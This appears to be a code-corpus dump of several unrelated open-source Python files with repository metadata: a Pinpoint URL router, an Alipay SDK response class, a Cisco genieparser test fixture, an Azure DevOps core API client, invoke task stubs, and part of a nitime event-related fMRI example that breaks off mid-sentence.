# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Dispatches requests to request handler classes."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import webapp2
from dashboard.pinpoint import handlers
_URL_MAPPING = [
# Public API.
webapp2.Route(r'/api/config', handlers.Config),
webapp2.Route(r'/api/commit', handlers.Commit),
webapp2.Route(r'/api/commits', handlers.Commits),
webapp2.Route(r'/api/generate-results2/<job_id>',
handlers.Results2Generator),
webapp2.Route(r'/api/isolate', handlers.Isolate),
webapp2.Route(r'/api/isolate/<builder_name>/<git_hash>/<target>',
handlers.CASReference),
webapp2.Route(r'/api/cas', handlers.CASReference),
webapp2.Route(r'/api/cas/<builder_name>/<git_hash>/<target>',
handlers.CASReference),
webapp2.Route(r'/api/job/cancel', handlers.Cancel),
webapp2.Route(r'/api/job/<job_id>', handlers.Job),
webapp2.Route(r'/api/jobs', handlers.Jobs),
webapp2.Route(r'/api/migrate', handlers.Migrate),
webapp2.Route(r'/api/new', handlers.New),
webapp2.Route(r'/api/results2/<job_id>', handlers.Results2),
webapp2.Route(r'/api/stats', handlers.Stats),
webapp2.Route(r'/api/queue-stats/<configuration>', handlers.QueueStats),
# Used internally by Pinpoint. Not accessible from the public API.
webapp2.Route(r'/api/run/<job_id>', handlers.Run),
webapp2.Route(r'/cron/isolate-cleanup', handlers.IsolateCleanup),
webapp2.Route(r'/cron/refresh-jobs', handlers.RefreshJobs),
webapp2.Route(r'/cron/fifo-scheduler', handlers.FifoScheduler),
# The /_ah/push-handlers/* paths have a special meaning for PubSub
# notifications, and is treated especially by the AppEngine environment.
webapp2.Route(r'/_ah/push-handlers/task-updates', handlers.TaskUpdates),
]
APP = webapp2.WSGIApplication(_URL_MAPPING, debug=False)
|
40d12f6eb8249cdfe4469a915f07e5a00204f67e
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/KoubeiAdvertDataConfQueryResponse.py
|
4864fb4bf7555728dcdac477575d3f3b128eaa82
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,870
|
py
|
KoubeiAdvertDataConfQueryResponse.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.KbadvertChannelTypeResponse import KbadvertChannelTypeResponse
from alipay.aop.api.domain.KbadvertCommissionLimit import KbadvertCommissionLimit
class KoubeiAdvertDataConfQueryResponse(AlipayResponse):
def __init__(self):
super(KoubeiAdvertDataConfQueryResponse, self).__init__()
self._channel_types = None
self._commission_limits = None
@property
def channel_types(self):
return self._channel_types
@channel_types.setter
def channel_types(self, value):
if isinstance(value, list):
self._channel_types = list()
for i in value:
if isinstance(i, KbadvertChannelTypeResponse):
self._channel_types.append(i)
else:
self._channel_types.append(KbadvertChannelTypeResponse.from_alipay_dict(i))
@property
def commission_limits(self):
return self._commission_limits
@commission_limits.setter
def commission_limits(self, value):
if isinstance(value, list):
self._commission_limits = list()
for i in value:
if isinstance(i, KbadvertCommissionLimit):
self._commission_limits.append(i)
else:
self._commission_limits.append(KbadvertCommissionLimit.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(KoubeiAdvertDataConfQueryResponse, self).parse_response_content(response_content)
if 'channel_types' in response:
self.channel_types = response['channel_types']
if 'commission_limits' in response:
self.commission_limits = response['commission_limits']
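# Hedged usage sketch (not part of the original module): the SDK's request
# executor normally constructs and populates this response object; done by
# hand it would look roughly like the following, with a hypothetical payload.
#
#     resp = KoubeiAdvertDataConfQueryResponse()
#     resp.parse_response_content('{"channel_types": [], "commission_limits": []}')
#     print(resp.channel_types, resp.commission_limits)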
|
851a524384b836fe6b35692286493b7c258fc3de
|
927b0170d041bee8aca868e88af19e2b8935f3a3
|
/tests/__init__.py
|
102c3ed4545d0963b55cfbd6b0c0837052d86d48
|
[
"MIT",
"CC-BY-4.0",
"ODbL-1.0"
] |
permissive
|
adbar/simplemma
|
f6cdfb1b3f314efac66e1c741cc97fe0a76be3dc
|
fa1d96469ca601b5249b8d5cbb42c1474cfd83bb
|
refs/heads/main
| 2023-08-19T05:09:04.815007
| 2023-08-02T10:57:50
| 2023-08-02T10:57:50
| 330,707,034
| 102
| 6
|
MIT
| 2023-09-12T17:03:17
| 2021-01-18T15:22:27
|
Python
|
UTF-8
|
Python
| false
| false
| 39
|
py
|
__init__.py
|
"""Unit test package for simplemma."""
|
09935ba8f34fb00a353cfe63df112c5e8ab2825a
|
5ef6c8d47864f471e26b9902d61f8c687e941f05
|
/src/genie/libs/parser/iosxe/tests/ShowIpPimInterfaceDf/cli/equal/golden_output_expected.py
|
23533da361b8ad9c3c28f0de87b55d8d92731729
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genieparser
|
169c196558f1c1a0f0d10650876096f993224917
|
b531eff760b2e44cd69d7a2716db6f866907c239
|
refs/heads/master
| 2023-09-03T08:56:18.831340
| 2023-08-29T22:32:02
| 2023-08-29T22:32:02
| 131,621,824
| 247
| 409
|
Apache-2.0
| 2023-08-29T22:32:04
| 2018-04-30T16:51:50
|
Python
|
UTF-8
|
Python
| false
| false
| 4,458
|
py
|
golden_output_expected.py
|
expected_output = {
"vrf": {
"default": {
"address_family": {
"ipv4": {
"rp": {
"bidir": {
"interface_df_election": {
"10.10.0.2 Ethernet3/3": {
"df_address": "10.4.0.2",
"metric": 0,
"df_uptime": "00:03:49",
"address": "10.10.0.2",
"winner_metric": 0,
"interface_name": "Ethernet3/3",
},
"10.10.0.3 Ethernet3/3": {
"df_address": "10.4.0.3",
"metric": 0,
"df_uptime": "00:01:49",
"address": "10.10.0.3",
"winner_metric": 0,
"interface_name": "Ethernet3/3",
},
"10.10.0.3 Ethernet3/4": {
"df_address": "10.5.0.2",
"metric": 409600,
"df_uptime": "00:02:32",
"address": "10.10.0.3",
"winner_metric": 409600,
"interface_name": "Ethernet3/4",
},
"10.10.0.5 Ethernet3/4": {
"df_address": "10.5.0.2",
"metric": 435200,
"df_uptime": "00:02:16",
"address": "10.10.0.5",
"winner_metric": 435200,
"interface_name": "Ethernet3/4",
},
"10.10.0.2 Loopback0": {
"df_address": "10.10.0.2",
"metric": 0,
"df_uptime": "00:03:49",
"address": "10.10.0.2",
"winner_metric": 0,
"interface_name": "Loopback0",
},
"10.10.0.2 Ethernet3/4": {
"df_address": "10.5.0.2",
"metric": 0,
"df_uptime": "00:03:49",
"address": "10.10.0.2",
"winner_metric": 0,
"interface_name": "Ethernet3/4",
},
"10.10.0.3 Loopback0": {
"df_address": "10.10.0.2",
"metric": 409600,
"df_uptime": "00:02:32",
"address": "10.10.0.3",
"winner_metric": 409600,
"interface_name": "Loopback0",
},
"10.10.0.5 Loopback0": {
"df_address": "10.10.0.2",
"metric": 435200,
"df_uptime": "00:02:16",
"address": "10.10.0.5",
"winner_metric": 435200,
"interface_name": "Loopback0",
},
"10.10.0.5 Ethernet3/3": {
"df_address": "10.4.0.4",
"metric": 409600,
"df_uptime": "00:01:49",
"address": "10.10.0.5",
"winner_metric": 409600,
"interface_name": "Ethernet3/3",
},
}
}
}
}
}
}
}
}
|
c8eeff5b1806fcae932d1615f38442817b6e16a3
|
98810fbf90a42028915a88bfac9fb8cb8681008e
|
/azure-devops/azext_devops/devops_sdk/v5_0/core/core_client.py
|
ff9b2f75677687a0af63f0141d64d2c53ddabc8f
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-unicode",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"PSF-2.0",
"PostgreSQL",
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"CC-BY-4.0",
"Python-2.0",
"MPL-1.1",
"OpenSSL",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"MPL-1.0",
"ISC",
"GPL-2.0-only",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"GPL-1.0-or-later",
"MPL-2.0"
] |
permissive
|
Azure/azure-devops-cli-extension
|
ba87357a8243e1318f100791fc32acbb59448d05
|
bd34a6fd0658a15dadf6c09c7f6217ca5ffa662b
|
refs/heads/master
| 2023-08-29T10:56:54.228674
| 2023-07-17T04:37:06
| 2023-07-17T04:37:06
| 107,708,057
| 419
| 208
|
MIT
| 2023-08-02T02:10:10
| 2017-10-20T17:39:11
|
Python
|
UTF-8
|
Python
| false
| false
| 24,344
|
py
|
core_client.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...client import Client
from . import models
class CoreClient(Client):
"""Core
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
super(CoreClient, self).__init__(base_url, creds)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
resource_area_identifier = '79134c72-4a58-4b42-976c-04e7115f32bf'
def create_connected_service(self, connected_service_creation_data, project_id):
"""CreateConnectedService.
[Preview API]
:param :class:`<WebApiConnectedServiceDetails> <azure.devops.v5_0.core.models.WebApiConnectedServiceDetails>` connected_service_creation_data:
:param str project_id:
:rtype: :class:`<WebApiConnectedService> <azure.devops.v5_0.core.models.WebApiConnectedService>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
content = self._serialize.body(connected_service_creation_data, 'WebApiConnectedServiceDetails')
response = self._send(http_method='POST',
location_id='b4f70219-e18b-42c5-abe3-98b07d35525e',
version='5.0-preview.1',
route_values=route_values,
content=content)
return self._deserialize('WebApiConnectedService', response)
def get_connected_service_details(self, project_id, name):
"""GetConnectedServiceDetails.
[Preview API]
:param str project_id:
:param str name:
:rtype: :class:`<WebApiConnectedServiceDetails> <azure.devops.v5_0.core.models.WebApiConnectedServiceDetails>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if name is not None:
route_values['name'] = self._serialize.url('name', name, 'str')
response = self._send(http_method='GET',
location_id='b4f70219-e18b-42c5-abe3-98b07d35525e',
version='5.0-preview.1',
route_values=route_values)
return self._deserialize('WebApiConnectedServiceDetails', response)
def get_connected_services(self, project_id, kind=None):
"""GetConnectedServices.
[Preview API]
:param str project_id:
:param str kind:
:rtype: [WebApiConnectedService]
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
query_parameters = {}
if kind is not None:
query_parameters['kind'] = self._serialize.query('kind', kind, 'str')
response = self._send(http_method='GET',
location_id='b4f70219-e18b-42c5-abe3-98b07d35525e',
version='5.0-preview.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[WebApiConnectedService]', self._unwrap_collection(response))
def get_team_members_with_extended_properties(self, project_id, team_id, top=None, skip=None):
"""GetTeamMembersWithExtendedProperties.
Get a list of members for a specific team.
:param str project_id: The name or ID (GUID) of the team project the team belongs to.
        :param str team_id: The name or ID (GUID) of the team.
:param int top:
:param int skip:
:rtype: [TeamMember]
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if team_id is not None:
route_values['teamId'] = self._serialize.url('team_id', team_id, 'str')
query_parameters = {}
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='294c494c-2600-4d7e-b76c-3dd50c3c95be',
version='5.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TeamMember]', self._unwrap_collection(response))
def get_process_by_id(self, process_id):
"""GetProcessById.
Get a process by ID.
:param str process_id: ID for a process.
:rtype: :class:`<Process> <azure.devops.v5_0.core.models.Process>`
"""
route_values = {}
if process_id is not None:
route_values['processId'] = self._serialize.url('process_id', process_id, 'str')
response = self._send(http_method='GET',
location_id='93878975-88c5-4e6a-8abb-7ddd77a8a7d8',
version='5.0',
route_values=route_values)
return self._deserialize('Process', response)
def get_processes(self):
"""GetProcesses.
Get a list of processes.
:rtype: [Process]
"""
response = self._send(http_method='GET',
location_id='93878975-88c5-4e6a-8abb-7ddd77a8a7d8',
version='5.0')
return self._deserialize('[Process]', self._unwrap_collection(response))
def get_project_collection(self, collection_id):
"""GetProjectCollection.
Get project collection with the specified id or name.
:param str collection_id:
:rtype: :class:`<TeamProjectCollection> <azure.devops.v5_0.core.models.TeamProjectCollection>`
"""
route_values = {}
if collection_id is not None:
route_values['collectionId'] = self._serialize.url('collection_id', collection_id, 'str')
response = self._send(http_method='GET',
location_id='8031090f-ef1d-4af6-85fc-698cd75d42bf',
version='5.0',
route_values=route_values)
return self._deserialize('TeamProjectCollection', response)
def get_project_collections(self, top=None, skip=None):
"""GetProjectCollections.
Get project collection references for this application.
:param int top:
:param int skip:
:rtype: [TeamProjectCollectionReference]
"""
query_parameters = {}
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='8031090f-ef1d-4af6-85fc-698cd75d42bf',
version='5.0',
query_parameters=query_parameters)
return self._deserialize('[TeamProjectCollectionReference]', self._unwrap_collection(response))
def get_project(self, project_id, include_capabilities=None, include_history=None):
"""GetProject.
Get project with the specified id or name, optionally including capabilities.
:param str project_id:
:param bool include_capabilities: Include capabilities (such as source control) in the team project result (default: false).
        :param bool include_history: Search within renamed projects (that had such a name in the past).
:rtype: :class:`<TeamProject> <azure.devops.v5_0.core.models.TeamProject>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
query_parameters = {}
if include_capabilities is not None:
query_parameters['includeCapabilities'] = self._serialize.query('include_capabilities', include_capabilities, 'bool')
if include_history is not None:
query_parameters['includeHistory'] = self._serialize.query('include_history', include_history, 'bool')
response = self._send(http_method='GET',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TeamProject', response)
def get_projects(self, state_filter=None, top=None, skip=None, continuation_token=None, get_default_team_image_url=None):
"""GetProjects.
Get all projects in the organization that the authenticated user has access to.
:param str state_filter: Filter on team projects in a specific team project state (default: WellFormed).
:param int top:
:param int skip:
:param str continuation_token:
:param bool get_default_team_image_url:
:rtype: [TeamProjectReference]
"""
query_parameters = {}
if state_filter is not None:
query_parameters['stateFilter'] = self._serialize.query('state_filter', state_filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
if continuation_token is not None:
query_parameters['continuationToken'] = self._serialize.query('continuation_token', continuation_token, 'str')
if get_default_team_image_url is not None:
query_parameters['getDefaultTeamImageUrl'] = self._serialize.query('get_default_team_image_url', get_default_team_image_url, 'bool')
response = self._send(http_method='GET',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
query_parameters=query_parameters)
return self._deserialize('[TeamProjectReference]', self._unwrap_collection(response))
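    # Hedged usage sketch (not part of the generated client): instances are
    # normally obtained from an authenticated Connection rather than built
    # directly; the import paths below follow the public azure-devops package
    # and are assumptions for this vendored copy.
    #
    #     from azure.devops.connection import Connection
    #     from msrest.authentication import BasicAuthentication
    #
    #     connection = Connection(base_url=organization_url,
    #                             creds=BasicAuthentication('', personal_access_token))
    #     core_client = connection.clients.get_core_client()
    #     for project in core_client.get_projects(top=10):
    #         print(project.name)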
def queue_create_project(self, project_to_create):
"""QueueCreateProject.
Queues a project to be created. Use the [GetOperation](../../operations/operations/get) to periodically check for create project status.
:param :class:`<TeamProject> <azure.devops.v5_0.core.models.TeamProject>` project_to_create: The project to create.
:rtype: :class:`<OperationReference> <azure.devops.v5_0.core.models.OperationReference>`
"""
content = self._serialize.body(project_to_create, 'TeamProject')
response = self._send(http_method='POST',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
content=content)
return self._deserialize('OperationReference', response)
def queue_delete_project(self, project_id):
"""QueueDeleteProject.
Queues a project to be deleted. Use the [GetOperation](../../operations/operations/get) to periodically check for delete project status.
:param str project_id: The project id of the project to delete.
:rtype: :class:`<OperationReference> <azure.devops.v5_0.core.models.OperationReference>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
response = self._send(http_method='DELETE',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
route_values=route_values)
return self._deserialize('OperationReference', response)
def update_project(self, project_update, project_id):
"""UpdateProject.
Update an existing project's name, abbreviation, or description.
:param :class:`<TeamProject> <azure.devops.v5_0.core.models.TeamProject>` project_update: The updates for the project.
:param str project_id: The project id of the project to update.
:rtype: :class:`<OperationReference> <azure.devops.v5_0.core.models.OperationReference>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
content = self._serialize.body(project_update, 'TeamProject')
response = self._send(http_method='PATCH',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
route_values=route_values,
content=content)
return self._deserialize('OperationReference', response)
def get_project_properties(self, project_id, keys=None):
"""GetProjectProperties.
[Preview API] Get a collection of team project properties.
:param str project_id: The team project ID.
:param [str] keys: A comma-delimited string of team project property names. Wildcard characters ("?" and "*") are supported. If no key is specified, all properties will be returned.
:rtype: [ProjectProperty]
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
query_parameters = {}
if keys is not None:
keys = ",".join(keys)
query_parameters['keys'] = self._serialize.query('keys', keys, 'str')
response = self._send(http_method='GET',
location_id='4976a71a-4487-49aa-8aab-a1eda469037a',
version='5.0-preview.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[ProjectProperty]', self._unwrap_collection(response))
def set_project_properties(self, project_id, patch_document):
"""SetProjectProperties.
[Preview API] Create, update, and delete team project properties.
:param str project_id: The team project ID.
:param :class:`<[JsonPatchOperation]> <azure.devops.v5_0.core.models.[JsonPatchOperation]>` patch_document: A JSON Patch document that represents an array of property operations. See RFC 6902 for more details on JSON Patch. The accepted operation verbs are Add and Remove, where Add is used for both creating and updating properties. The path consists of a forward slash and a property name.
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
content = self._serialize.body(patch_document, '[JsonPatchOperation]')
self._send(http_method='PATCH',
location_id='4976a71a-4487-49aa-8aab-a1eda469037a',
version='5.0-preview.1',
route_values=route_values,
content=content,
media_type='application/json-patch+json')
def create_or_update_proxy(self, proxy):
"""CreateOrUpdateProxy.
[Preview API]
:param :class:`<Proxy> <azure.devops.v5_0.core.models.Proxy>` proxy:
:rtype: :class:`<Proxy> <azure.devops.v5_0.core.models.Proxy>`
"""
content = self._serialize.body(proxy, 'Proxy')
response = self._send(http_method='PUT',
location_id='ec1f4311-f2b4-4c15-b2b8-8990b80d2908',
version='5.0-preview.2',
content=content)
return self._deserialize('Proxy', response)
def delete_proxy(self, proxy_url, site=None):
"""DeleteProxy.
[Preview API]
:param str proxy_url:
:param str site:
"""
query_parameters = {}
if proxy_url is not None:
query_parameters['proxyUrl'] = self._serialize.query('proxy_url', proxy_url, 'str')
if site is not None:
query_parameters['site'] = self._serialize.query('site', site, 'str')
self._send(http_method='DELETE',
location_id='ec1f4311-f2b4-4c15-b2b8-8990b80d2908',
version='5.0-preview.2',
query_parameters=query_parameters)
def get_proxies(self, proxy_url=None):
"""GetProxies.
[Preview API]
:param str proxy_url:
:rtype: [Proxy]
"""
query_parameters = {}
if proxy_url is not None:
query_parameters['proxyUrl'] = self._serialize.query('proxy_url', proxy_url, 'str')
response = self._send(http_method='GET',
location_id='ec1f4311-f2b4-4c15-b2b8-8990b80d2908',
version='5.0-preview.2',
query_parameters=query_parameters)
return self._deserialize('[Proxy]', self._unwrap_collection(response))
def create_team(self, team, project_id):
"""CreateTeam.
Create a team in a team project.
:param :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>` team: The team data used to create the team.
:param str project_id: The name or ID (GUID) of the team project in which to create the team.
:rtype: :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
content = self._serialize.body(team, 'WebApiTeam')
response = self._send(http_method='POST',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values,
content=content)
return self._deserialize('WebApiTeam', response)
def delete_team(self, project_id, team_id):
"""DeleteTeam.
Delete a team.
:param str project_id: The name or ID (GUID) of the team project containing the team to delete.
        :param str team_id: The name or ID of the team to delete.
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if team_id is not None:
route_values['teamId'] = self._serialize.url('team_id', team_id, 'str')
self._send(http_method='DELETE',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values)
def get_team(self, project_id, team_id):
"""GetTeam.
Get a specific team.
:param str project_id: The name or ID (GUID) of the team project containing the team.
:param str team_id: The name or ID (GUID) of the team.
:rtype: :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if team_id is not None:
route_values['teamId'] = self._serialize.url('team_id', team_id, 'str')
response = self._send(http_method='GET',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values)
return self._deserialize('WebApiTeam', response)
def get_teams(self, project_id, mine=None, top=None, skip=None):
"""GetTeams.
Get a list of teams.
:param str project_id:
        :param bool mine: If true, return only the teams of which the requesting user is a member; otherwise return all the teams the user has read access to
:param int top: Maximum number of teams to return.
:param int skip: Number of teams to skip.
:rtype: [WebApiTeam]
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
query_parameters = {}
if mine is not None:
query_parameters['$mine'] = self._serialize.query('mine', mine, 'bool')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[WebApiTeam]', self._unwrap_collection(response))
def update_team(self, team_data, project_id, team_id):
"""UpdateTeam.
Update a team's name and/or description.
:param :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>` team_data:
:param str project_id: The name or ID (GUID) of the team project containing the team to update.
        :param str team_id: The name or ID of the team to update.
:rtype: :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if team_id is not None:
route_values['teamId'] = self._serialize.url('team_id', team_id, 'str')
content = self._serialize.body(team_data, 'WebApiTeam')
response = self._send(http_method='PATCH',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values,
content=content)
return self._deserialize('WebApiTeam', response)
def get_all_teams(self, mine=None, top=None, skip=None):
"""GetAllTeams.
[Preview API] Get a list of all teams.
        :param bool mine: If true, return only the teams of which the requesting user is a member; otherwise return all the teams the user has read access to
:param int top: Maximum number of teams to return.
:param int skip: Number of teams to skip.
:rtype: [WebApiTeam]
"""
query_parameters = {}
if mine is not None:
query_parameters['$mine'] = self._serialize.query('mine', mine, 'bool')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='7a4d9ee9-3433-4347-b47a-7a80f1cf307e',
version='5.0-preview.2',
query_parameters=query_parameters)
return self._deserialize('[WebApiTeam]', self._unwrap_collection(response))
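# Minimal usage sketch (hypothetical organization URL, token, and project
# name; assumes the ``azure-devops`` package's Connection helper, which
# exposes this client via ``connection.clients.get_core_client()``):
if __name__ == '__main__':
    from azure.devops.connection import Connection
    from msrest.authentication import BasicAuthentication

    connection = Connection(
        base_url='https://dev.azure.com/my-org',
        creds=BasicAuthentication('', 'my-personal-access-token'))
    core_client = connection.clients.get_core_client()
    # List the first 10 teams of a (hypothetical) project.
    for team in core_client.get_teams('MyProject', top=10):
        print(team.name)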
|
27df837a92165313839d59db51a64531ec0c0c3b
|
2bacad06ed143d941bb65a49a6dec91572b22305
|
/tests/_support/tree/deploy.py
|
35f749ec79865e8b745b5c8146695c226af13e8b
|
[
"BSD-2-Clause"
] |
permissive
|
pyinvoke/invoke
|
86ad280d862dc8f5cb6baf5c0bfba9aeb97fd95d
|
07b836f2663bb073a7bcef3d6c454e1dc6b867ae
|
refs/heads/main
| 2023-09-01T16:04:50.414421
| 2023-07-12T18:04:56
| 2023-07-12T18:04:56
| 3,587,206
| 3,702
| 401
|
BSD-2-Clause
| 2023-07-11T07:18:40
| 2012-02-29T23:59:23
|
Python
|
UTF-8
|
Python
| false
| false
| 301
|
py
|
deploy.py
|
"How to deploy our code and configs."
from invoke import task
@task(default=True)
def everywhere(c):
"Deploy to all targets."
pass
@task(aliases=["db_servers"])
def db(c):
"Deploy to our database servers."
pass
@task
def web(c):
"Update and bounce the webservers."
pass
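# Usage sketch: from the directory containing this file, these tasks are run
# through the invoke CLI, e.g. ``invoke everywhere`` or ``invoke db`` (alias
# ``db_servers``). Programmatically, a @task-decorated object stays callable
# when handed a Context:
#
#     from invoke import Context
#     everywhere(Context())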
|
1c622384c983eb3e23779db324eb005b2bed8e06
|
e7f662e18141c11bb452a31b844dd5555cca11dd
|
/doc/examples/event_related_fmri.py
|
44cb399129cafcb64ce4fecc5b09096f2f1668a3
|
[
"BSD-3-Clause"
] |
permissive
|
nipy/nitime
|
75c7786e17514ecc7045c42760cd42b1c16ca0d6
|
4411b3047e37d21354e399aaaca77810f50c5fe2
|
refs/heads/master
| 2023-06-29T21:13:24.231303
| 2023-06-15T22:33:13
| 2023-06-15T22:33:13
| 294,865
| 198
| 69
|
BSD-3-Clause
| 2023-08-25T20:49:40
| 2009-09-02T00:29:57
|
Python
|
UTF-8
|
Python
| false
| false
| 4,192
|
py
|
event_related_fmri.py
|
"""
.. _et-fmri:
==================
Event-related fMRI
==================
Extracting the average time-series from one signal, time-locked to the
occurrence of some type of event in another signal is a very typical operation
in the analysis of time-series from neuroscience experiments. Therefore, we
have an additional example of this kind of analysis in :ref:`grasshopper`
The following example is taken from an fMRI experiment in which a subject was
viewing a motion stimulus, while fMRI BOLD was recorded. The time-series in
this data set were extracted from motion-sensitive voxels near area MT (a
region containing motion-sensitive cells) in this subject's brain. 6 different
kinds of trials could occur in this experiment (designating different
directions and locations of motion). The following example shows the extraction
of the time-dependent responses of the voxels in this region to the different
stimuli.
We start by importing modules/functions used and define some variables we will
use in the analysis:
"""
import os
import numpy as np
import matplotlib.pyplot as plt
import nitime
import nitime.timeseries as ts
import nitime.analysis as nta
import nitime.viz as viz
TR = 2.
len_et = 15 # This is given in number of samples, not time!
"""
Next, we load the data into an array from the csv file, using ``np.genfromtxt``
"""
data_path = os.path.join(nitime.__path__[0], 'data')
fname = os.path.join(data_path, 'event_related_fmri.csv')
data = np.genfromtxt(fname, dtype=float, delimiter=',', names=True)
"""
We initialize TimeSeries objects with the data and the TR:
One TimeSeries is initialized for the BOLD data:
"""
t1 = ts.TimeSeries(data['bold'], sampling_interval=TR)
"""
And another one for the events (the different stimuli):
"""
t2 = ts.TimeSeries(data['events'], sampling_interval=TR)
"""
Note that this example uses the EventRelated analyzer (also used in the
:ref:`grasshopper` example), but here, instead of providing an :class:`Events`
object as input, another :class:`TimeSeries` object is provided, containing an
equivalent time-series with the same dimensions as the time-series on which the
analysis is done, with '0' wherever no event of interest occurred and an integer
wherever an even of interest occurred (sequential different integers for the
different kinds of events).
"""
E = nta.EventRelatedAnalyzer(t1, t2, len_et)
"""
Two different methods of the EventRelatedAnalyzer are used: :attr:`E.eta`
refers to the event-triggered average of the activity and :attr:`E.ets` refers
to the event-triggered standard error of the mean (where the degrees of freedom
are set by the number of trials). Note that you can also extract the
event-triggered data itself as a list, by referring instead to
:attr:`E.et_data`.
We pass the eta and ets calculations straight into the visualization function,
which plots the result:
"""
fig01 = viz.plot_tseries(E.eta, ylabel='BOLD (% signal change)', yerror=E.ets)
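"""
A minimal sketch of extracting the event-triggered data itself, relying on
:attr:`E.et_data` returning the per-event-type trials as a list (as noted
above):
"""

et_trials = E.et_data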
"""
.. image:: fig/event_related_fmri_01.png
In the following example an alternative approach is taken to calculating
the event-related activity, based on the finite impulse-response
model (see [Burock2000]_ for details)
"""
fig02 = viz.plot_tseries(E.FIR, ylabel='BOLD (% signal change)')
"""
.. image:: fig/event_related_fmri_02.png
Yet another method is based on a cross-correlation performed in the frequency
